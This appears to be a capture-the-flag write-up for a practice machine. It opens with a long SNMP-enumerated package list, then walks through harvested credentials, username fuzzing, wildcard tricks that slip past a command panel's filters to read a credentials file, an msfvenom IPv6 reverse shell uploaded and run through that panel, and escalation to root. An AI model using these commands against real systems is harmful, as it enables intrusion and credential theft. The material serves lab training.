| libpython3.6-minimal-3.6.5-3; 0-01-01T00:00:00
| libpython3.6-stdlib-3.6.5-3; 0-01-01T00:00:00
| libquadmath0-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libreadline5-5.2+dfsg-3build1; 0-01-01T00:00:00
| libreadline7-7.0-3; 0-01-01T00:00:00
| libroken18-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| librtmp1-2.4+20151223.gitfa8646d.1-1; 0-01-01T00:00:00
| libsasl2-2-2.1.27~101-g0780600+dfsg-3ubuntu2; 0-01-01T00:00:00
| libsasl2-modules-2.1.27~101-g0780600+dfsg-3ubuntu2; 0-01-01T00:00:00
| libsasl2-modules-db-2.1.27~101-g0780600+dfsg-3ubuntu2; 0-01-01T00:00:00
| libseccomp2-2.3.1-2.1ubuntu4; 0-01-01T00:00:00
| libselinux1-2.7-2build2; 0-01-01T00:00:00
| libsemanage-common-2.7-2build2; 0-01-01T00:00:00
| libsemanage1-2.7-2build2; 0-01-01T00:00:00
| libsensors4-1:3.4.0-4; 0-01-01T00:00:00
| libsepol1-2.7-1; 0-01-01T00:00:00
| libsigsegv2-2.12-1; 0-01-01T00:00:00
| libslang2-2.3.1a-3ubuntu1; 0-01-01T00:00:00
| libsmartcols1-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| libsnmp-base-5.7.3+dfsg-1.8ubuntu3; 0-01-01T00:00:00
| libsnmp30-5.7.3+dfsg-1.8ubuntu3; 0-01-01T00:00:00
| libsodium23-1.0.16-2; 0-01-01T00:00:00
| libsqlite3-0-3.22.0-1; 0-01-01T00:00:00
| libss2-1.44.1-1; 0-01-01T00:00:00
| libssl1.0.0-1.0.2n-1ubuntu5; 0-01-01T00:00:00
| libssl1.1-1.1.0g-2ubuntu4; 0-01-01T00:00:00
| libstdc++-7-dev-7.3.0-16ubuntu3; 0-01-01T00:00:00
| libstdc++6-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libsystemd0-237-3ubuntu10; 0-01-01T00:00:00
| libtasn1-6-4.13-2; 0-01-01T00:00:00
| libtext-charwidth-perl-0.04-7.1; 0-01-01T00:00:00
| libtext-iconv-perl-1.7-5build6; 0-01-01T00:00:00
| libtext-wrapi18n-perl-0.06-7.1; 0-01-01T00:00:00
| libtimedate-perl-2.3000-2; 0-01-01T00:00:00
| libtinfo5-6.1-1ubuntu1; 0-01-01T00:00:00
| libtsan0-8-20180414-1ubuntu2; 0-01-01T00:00:00
| libubsan0-7.3.0-16ubuntu3; 0-01-01T00:00:00
| libudev1-237-3ubuntu10; 0-01-01T00:00:00
| libunistring2-0.9.9-0ubuntu1; 0-01-01T00:00:00
| libunwind8-1.2.1-8; 0-01-01T00:00:00
| liburi-perl-1.73-1; 0-01-01T00:00:00
| libusb-1.0-0-2:1.0.21-2; 0-01-01T00:00:00
| libutempter0-1.1.6-3; 0-01-01T00:00:00
| libuuid1-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| libwind0-heimdal-7.5.0+dfsg-1; 0-01-01T00:00:00
| libwrap0-7.6.q-27; 0-01-01T00:00:00
| libx11-6-2:1.6.4-3; 0-01-01T00:00:00
| libx11-data-2:1.6.4-3; 0-01-01T00:00:00
| libxau6-1:1.0.8-1; 0-01-01T00:00:00
| libxcb1-1.13-1; 0-01-01T00:00:00
| libxdmcp6-1:1.1.2-3; 0-01-01T00:00:00
| libxext6-2:1.3.3-1; 0-01-01T00:00:00
| libxml2-2.9.4+dfsg1-6.1ubuntu1; 0-01-01T00:00:00
| libxmlsec1-1.2.25-1build1; 0-01-01T00:00:00
| libxmlsec1-openssl-1.2.25-1build1; 0-01-01T00:00:00
| libxmuu1-2:1.1.2-2; 0-01-01T00:00:00
| libxslt1.1-1.1.29-5; 0-01-01T00:00:00
| libxtables12-1.6.1-2ubuntu2; 0-01-01T00:00:00
| libyaml-0-2-0.1.7-2ubuntu3; 0-01-01T00:00:00
| libzstd1-1.3.3+dfsg-2ubuntu1; 0-01-01T00:00:00
| linux-base-4.5ubuntu1; 0-01-01T00:00:00
| linux-firmware-1.173; 0-01-01T00:00:00
| linux-generic-4.15.0.20.23; 0-01-01T00:00:00
| linux-headers-4.15.0-20-4.15.0-20.21; 0-01-01T00:00:00
| linux-headers-4.15.0-20-generic-4.15.0-20.21; 0-01-01T00:00:00
| linux-headers-generic-4.15.0.20.23; 0-01-01T00:00:00
| linux-image-4.15.0-20-generic-4.15.0-20.21; 0-01-01T00:00:00
| linux-image-generic-4.15.0.20.23; 0-01-01T00:00:00
| linux-libc-dev-4.15.0-20.21; 0-01-01T00:00:00
| linux-modules-4.15.0-20-generic-4.15.0-20.21; 0-01-01T00:00:00
| linux-modules-extra-4.15.0-20-generic-4.15.0-20.21; 0-01-01T00:00:00
| linux-signed-generic-4.15.0.20.23; 0-01-01T00:00:00
| locales-2.27-3ubuntu1; 0-01-01T00:00:00
| login-1:4.5-1ubuntu1; 0-01-01T00:00:00
| logrotate-3.11.0-0.1ubuntu1; 0-01-01T00:00:00
| lsb-base-9.20170808ubuntu1; 0-01-01T00:00:00
| lsb-release-9.20170808ubuntu1; 0-01-01T00:00:00
| lshw-02.18-0.1ubuntu6; 0-01-01T00:00:00
| lsof-4.89+dfsg-0.1; 0-01-01T00:00:00
| ltrace-0.7.3-6ubuntu1; 0-01-01T00:00:00
| lvm2-2.02.176-4.1ubuntu3; 0-01-01T00:00:00
| lxcfs-3.0.0-0ubuntu1; 0-01-01T00:00:00
| lxd-client-3.0.0-0ubuntu4; 0-01-01T00:00:00
| make-4.1-9.1ubuntu1; 0-01-01T00:00:00
| man-db-2.8.3-2; 0-01-01T00:00:00
| manpages-4.15-1; 0-01-01T00:00:00
| manpages-dev-4.15-1; 0-01-01T00:00:00
| mawk-1.3.3-17ubuntu3; 0-01-01T00:00:00
| mdadm-4.0-2ubuntu1; 0-01-01T00:00:00
| mime-support-3.60ubuntu1; 0-01-01T00:00:00
| mlocate-0.26-2ubuntu3.1; 0-01-01T00:00:00
| mount-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| mtr-tiny-0.92-1; 0-01-01T00:00:00
| multiarch-support-2.27-3ubuntu1; 0-01-01T00:00:00
| mysql-client-5.7-5.7.22-0ubuntu18.04.1; 0-01-01T00:00:00
| mysql-client-core-5.7-5.7.22-0ubuntu18.04.1; 0-01-01T00:00:00
| mysql-common-5.8+1.0.4; 0-01-01T00:00:00
| mysql-server-5.7-5.7.22-0ubuntu18.04.1; 0-01-01T00:00:00
| mysql-server-5.7.22-0ubuntu18.04.1; 0-01-01T00:00:00
| mysql-server-core-5.7-5.7.22-0ubuntu18.04.1; 0-01-01T00:00:00
| nano-2.9.3-2; 0-01-01T00:00:00
| ncurses-base-6.1-1ubuntu1; 0-01-01T00:00:00
| ncurses-bin-6.1-1ubuntu1; 0-01-01T00:00:00
| ncurses-term-6.1-1ubuntu1; 0-01-01T00:00:00
| net-tools-1.60+git20161116.90da8a0-1ubuntu1; 0-01-01T00:00:00
| netbase-5.4; 0-01-01T00:00:00
| netcat-openbsd-1.187-1; 0-01-01T00:00:00
| netfilter-persistent-1.0.4+nmu2; 0-01-01T00:00:00
| netplan.io-0.36.1; 0-01-01T00:00:00
| networkd-dispatcher-1.7-0ubuntu3; 0-01-01T00:00:00
| nplan-0.36.1; 0-01-01T00:00:00
| ntfs-3g-1:2017.3.23-2; 0-01-01T00:00:00
| open-iscsi-2.0.874-5ubuntu2; 0-01-01T00:00:00
| open-vm-tools-2:10.2.0-3ubuntu3; 0-01-01T00:00:00
| openssh-client-1:7.6p1-4; 0-01-01T00:00:00
| openssh-server-1:7.6p1-4; 0-01-01T00:00:00
| openssh-sftp-server-1:7.6p1-4; 0-01-01T00:00:00
| openssl-1.1.0g-2ubuntu4; 0-01-01T00:00:00
| os-prober-1.74ubuntu1; 0-01-01T00:00:00
| overlayroot-0.40ubuntu1; 0-01-01T00:00:00
| parted-3.2-20; 0-01-01T00:00:00
| passwd-1:4.5-1ubuntu1; 0-01-01T00:00:00
| pastebinit-1.5-2; 0-01-01T00:00:00
| patch-2.7.6-2ubuntu1; 0-01-01T00:00:00
| pciutils-1:3.5.2-1ubuntu1; 0-01-01T00:00:00
| perl-5.26.1-6; 0-01-01T00:00:00
| perl-base-5.26.1-6; 0-01-01T00:00:00
| perl-modules-5.26-5.26.1-6; 0-01-01T00:00:00
| php-1:7.2+60ubuntu1; 0-01-01T00:00:00
| php-common-1:60ubuntu1; 0-01-01T00:00:00
| php-mysql-1:7.2+60ubuntu1; 0-01-01T00:00:00
| php7.2-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-cli-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-common-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-json-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-mysql-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-opcache-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| php7.2-readline-7.2.5-0ubuntu0.18.04.1; 0-01-01T00:00:00
| pinentry-curses-1.1.0-1; 0-01-01T00:00:00
| plymouth-0.9.3-1ubuntu7; 0-01-01T00:00:00
| plymouth-theme-ubuntu-text-0.9.3-1ubuntu7; 0-01-01T00:00:00
| policykit-1-0.105-20; 0-01-01T00:00:00
| pollinate-4.31-0ubuntu1; 0-01-01T00:00:00
| popularity-contest-1.66ubuntu1; 0-01-01T00:00:00
| powermgmt-base-1.33; 0-01-01T00:00:00
| procps-2:3.3.12-3ubuntu1; 0-01-01T00:00:00
| psmisc-23.1-1; 0-01-01T00:00:00
| publicsuffix-20180223.1310-1; 0-01-01T00:00:00
| python-2.7.15~rc1-1; 0-01-01T00:00:00
| python-all-2.7.15~rc1-1; 0-01-01T00:00:00
| python-all-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| python-apt-common-1.6.0; 0-01-01T00:00:00
| python-asn1crypto-0.24.0-1; 0-01-01T00:00:00
| python-cffi-backend-1.11.5-1; 0-01-01T00:00:00
| python-crypto-2.6.1-8ubuntu2; 0-01-01T00:00:00
| python-cryptography-2.1.4-1ubuntu1.1; 0-01-01T00:00:00
| python-dbus-1.2.6-1; 0-01-01T00:00:00
| python-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| python-enum34-1.1.6-2; 0-01-01T00:00:00
| python-gi-3.26.1-2; 0-01-01T00:00:00
| python-idna-2.6-1; 0-01-01T00:00:00
| python-ipaddress-1.0.17-1; 0-01-01T00:00:00
| python-keyring-10.6.0-1; 0-01-01T00:00:00
| python-keyrings.alt-3.0-1; 0-01-01T00:00:00
| python-minimal-2.7.15~rc1-1; 0-01-01T00:00:00
| python-pip-9.0.1-2; 0-01-01T00:00:00
| python-pip-whl-9.0.1-2; 0-01-01T00:00:00
| python-pkg-resources-39.0.1-2; 0-01-01T00:00:00
| python-secretstorage-2.3.1-2; 0-01-01T00:00:00
| python-setuptools-39.0.1-2; 0-01-01T00:00:00
| python-six-1.11.0-2; 0-01-01T00:00:00
| python-wheel-0.30.0-0.2; 0-01-01T00:00:00
| python-xdg-0.25-4ubuntu1; 0-01-01T00:00:00
| python2.7-2.7.15~rc1-1; 0-01-01T00:00:00
| python2.7-dev-2.7.15~rc1-1; 0-01-01T00:00:00
| python2.7-minimal-2.7.15~rc1-1; 0-01-01T00:00:00
| python3-3.6.5-3; 0-01-01T00:00:00
| python3-apport-2.20.9-0ubuntu7; 0-01-01T00:00:00
| python3-apt-1.6.0; 0-01-01T00:00:00
| python3-asn1crypto-0.24.0-1; 0-01-01T00:00:00
| python3-attr-17.4.0-2; 0-01-01T00:00:00
| python3-automat-0.6.0-1; 0-01-01T00:00:00
| python3-blinker-1.4+dfsg1-0.1; 0-01-01T00:00:00
| python3-certifi-2018.1.18-2; 0-01-01T00:00:00
| python3-cffi-backend-1.11.5-1; 0-01-01T00:00:00
| python3-chardet-3.0.4-1; 0-01-01T00:00:00
| python3-click-6.7-3; 0-01-01T00:00:00
| python3-colorama-0.3.7-1; 0-01-01T00:00:00
| python3-commandnotfound-18.04.4; 0-01-01T00:00:00
| python3-configobj-5.0.6-2; 0-01-01T00:00:00
| python3-constantly-15.1.0-1; 0-01-01T00:00:00
| python3-cryptography-2.1.4-1ubuntu1.1; 0-01-01T00:00:00
| python3-dbus-1.2.6-1; 0-01-01T00:00:00
| python3-debconf-1.5.66; 0-01-01T00:00:00
| python3-debian-0.1.32; 0-01-01T00:00:00
| python3-distro-info-0.18; 0-01-01T00:00:00
| python3-distupgrade-1:18.04.17; 0-01-01T00:00:00
| python3-gdbm-3.6.5-3; 0-01-01T00:00:00
| python3-gi-3.26.1-2; 0-01-01T00:00:00
| python3-httplib2-0.9.2+dfsg-1; 0-01-01T00:00:00
| python3-hyperlink-17.3.1-2; 0-01-01T00:00:00
| python3-idna-2.6-1; 0-01-01T00:00:00
| python3-incremental-16.10.1-3; 0-01-01T00:00:00
| python3-jinja2-2.10-1; 0-01-01T00:00:00
| python3-json-pointer-1.10-1; 0-01-01T00:00:00
| python3-jsonpatch-1.19+really1.16-1fakesync1; 0-01-01T00:00:00
| python3-jsonschema-2.6.0-2; 0-01-01T00:00:00
| python3-jwt-1.5.3+ds1-1; 0-01-01T00:00:00
| python3-markupsafe-1.0-1build1; 0-01-01T00:00:00
| python3-minimal-3.6.5-3; 0-01-01T00:00:00
| python3-newt-0.52.20-1ubuntu1; 0-01-01T00:00:00
| python3-oauthlib-2.0.6-1; 0-01-01T00:00:00
| python3-openssl-17.5.0-1ubuntu1; 0-01-01T00:00:00
| python3-pam-0.4.2-13.2ubuntu4; 0-01-01T00:00:00
| python3-pkg-resources-39.0.1-2; 0-01-01T00:00:00
| python3-problem-report-2.20.9-0ubuntu7; 0-01-01T00:00:00
| python3-pyasn1-0.4.2-3; 0-01-01T00:00:00
| python3-pyasn1-modules-0.2.1-0.2; 0-01-01T00:00:00
| python3-requests-2.18.4-2; 0-01-01T00:00:00
| python3-requests-unixsocket-0.1.5-3; 0-01-01T00:00:00
| python3-serial-3.4-2; 0-01-01T00:00:00
| python3-service-identity-16.0.0-2; 0-01-01T00:00:00
| python3-six-1.11.0-2; 0-01-01T00:00:00
| python3-software-properties-0.96.24.32.1; 0-01-01T00:00:00
| python3-systemd-234-1build1; 0-01-01T00:00:00
| python3-twisted-17.9.0-2; 0-01-01T00:00:00
| python3-twisted-bin-17.9.0-2; 0-01-01T00:00:00
| python3-update-manager-1:18.04.11; 0-01-01T00:00:00
| python3-urllib3-1.22-1; 0-01-01T00:00:00
| python3-yaml-3.12-1build2; 0-01-01T00:00:00
| python3-zope.interface-4.3.2-1build2; 0-01-01T00:00:00
| python3.6-3.6.5-3; 0-01-01T00:00:00
| python3.6-minimal-3.6.5-3; 0-01-01T00:00:00
| readline-common-7.0-3; 0-01-01T00:00:00
| rsync-3.1.2-2.1ubuntu1; 0-01-01T00:00:00
| rsyslog-8.32.0-1ubuntu4; 0-01-01T00:00:00
| run-one-1.17-0ubuntu1; 0-01-01T00:00:00
| screen-4.6.2-1; 0-01-01T00:00:00
| sed-4.4-2; 0-01-01T00:00:00
| sensible-utils-0.0.12; 0-01-01T00:00:00
| shared-mime-info-1.9-2; 0-01-01T00:00:00
| snmpd-5.7.3+dfsg-1.8ubuntu3; 0-01-01T00:00:00
| software-properties-common-0.96.24.32.1; 0-01-01T00:00:00
| sosreport-3.5-1ubuntu3; 0-01-01T00:00:00
| ssh-import-id-5.7-0ubuntu1; 0-01-01T00:00:00
| ssl-cert-1.0.39; 0-01-01T00:00:00
| strace-4.21-1ubuntu1; 0-01-01T00:00:00
| sudo-1.8.21p2-3ubuntu1; 0-01-01T00:00:00
| systemd-237-3ubuntu10; 0-01-01T00:00:00
| systemd-sysv-237-3ubuntu10; 0-01-01T00:00:00
| sysvinit-utils-2.88dsf-59.10ubuntu1; 0-01-01T00:00:00
| tar-1.29b-2; 0-01-01T00:00:00
| tcpdump-4.9.2-3; 0-01-01T00:00:00
| telnet-0.17-41; 0-01-01T00:00:00
| thermald-1.7.0-5ubuntu1; 0-01-01T00:00:00
| time-1.7-25.1build1; 0-01-01T00:00:00
| tmux-2.6-3; 0-01-01T00:00:00
| tzdata-2018d-1; 0-01-01T00:00:00
| ubuntu-advantage-tools-17; 0-01-01T00:00:00
| ubuntu-keyring-2018.02.28; 0-01-01T00:00:00
| ubuntu-minimal-1.417; 0-01-01T00:00:00
| ubuntu-release-upgrader-core-1:18.04.17; 0-01-01T00:00:00
| ubuntu-standard-1.417; 0-01-01T00:00:00
| ucf-3.0038; 0-01-01T00:00:00
| udev-237-3ubuntu10; 0-01-01T00:00:00
| ufw-0.35-5; 0-01-01T00:00:00
| uidmap-1:4.5-1ubuntu1; 0-01-01T00:00:00
| unattended-upgrades-1.1ubuntu1; 0-01-01T00:00:00
| unzip-6.0-21ubuntu1; 0-01-01T00:00:00
| update-manager-core-1:18.04.11; 0-01-01T00:00:00
| update-notifier-common-3.192.1; 0-01-01T00:00:00
| ureadahead-0.100.0-20; 0-01-01T00:00:00
| usbutils-1:007-4build1; 0-01-01T00:00:00
| util-linux-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| uuid-runtime-2.31.1-0.4ubuntu3; 0-01-01T00:00:00
| vim-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| vim-common-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| vim-runtime-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| vim-tiny-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| wget-1.19.4-1ubuntu2.1; 0-01-01T00:00:00
| whiptail-0.52.20-1ubuntu1; 0-01-01T00:00:00
| wireless-regdb-2016.06.10-0ubuntu1; 0-01-01T00:00:00
| xauth-1:1.0.10-1; 0-01-01T00:00:00
| xdelta3-3.0.11-dfsg-1ubuntu1; 0-01-01T00:00:00
| xdg-user-dirs-0.17-1ubuntu1; 0-01-01T00:00:00
| xfsprogs-4.9.0+nmu1ubuntu2; 0-01-01T00:00:00
| xkb-data-2.23.1-1ubuntu1; 0-01-01T00:00:00
| xxd-2:8.0.1453-1ubuntu1; 0-01-01T00:00:00
| xz-utils-5.2.2-1.3; 0-01-01T00:00:00
| zerofree-1.0.4-1; 0-01-01T00:00:00
|_ zlib1g-1:1.2.11.dfsg-0ubuntu2; 0-01-01T00:00:00
Awesome. The credential is (loki:godofmischiefisloki). Of course! Who else is more mischievous.
Notice in the SNMP enumeration, Apache is running but we can’t access it? It must be listening on an IPv6 address but what is the address?
Using a simple SNMP IPv6 enumerator script written by the creator, we can get the IPv6 address.
Another attack surface emerges.
Recall the two credentials from earlier? The second password is valid but not the username. I fuzz the username with wfuzz and the top-short usernames from SecLists.
Log in with the credentials (administrator:trickeryanddeceit).
Low-Privilege Shell
What you see here is a remote command execution panel. Suffice to say, certain commands and paths are forbidden. Combined with shell wildcards such as asterisk * and question mark ?, for zero or more characters and single character respectively, we are able to tease out the location of the file and display it in base64 no less.
List directories and files with ls
/bin/?s -la /home/loki; ping -c 2 127.0.0.1
Display /home/loki/credentials with base64
base64 /home/loki/c*; ping -c 2 127.0.0.1
The password is decoded like so.
Time to claim our low-privilege shell.
The user flag is here.
Privilege Escalation
During enumeration of loki’s account, you’ll notice that loki is stripped off execute rights with File Access Control List (ACL) for su and sudo but not the rest of the users. Look around, what other users are there?
Recall the Command Execution Panel running off Apache or www-data to be exact?
We can upload a reverse shell and execute it to get a shell as www-data. We’ll use msfvenom to generate a reverse shell. Bear in mind, the host has blocked all outgoing IPv4 connections, so we’ll have to use a IPv6 reverse shell instead.
msfvenom -p linux/x86/shell_reverse_tcp_ipv6 LHOST=dead:beef:2::116a LPORT=1234 -f elf -o rev
Conversely, you need to set up an IPv6 listener. You can do that with ncat.
ncat -6 -lnvp 1234
Now, use the Command Execution Panel to upload the reverse shell like so.
echo pif0V...ABzYA= | base64 -d >/tmp/rev; ping -c 2 127.0.0.1
Make the reverse shell executable.
/bin/?hm?d 777 /tmp/rev; ping -c 2 127.0.0.1
Finally, execute the reverse shell.
/tmp/rev; ping -c 2 127.0.0.1
Voila, another shell. This time as www-data.
If you have done your enumeration thorough enough, you would have notice another password in loki’s home directory. This is how it looks like.
Saw the password? At first glance, you might have dismissed it as the first password for the Basic authentication.
Now, let’s see if that’s the root password.
What’s the flag?
The trickster is tricky indeed.
One more command to find the root flag.
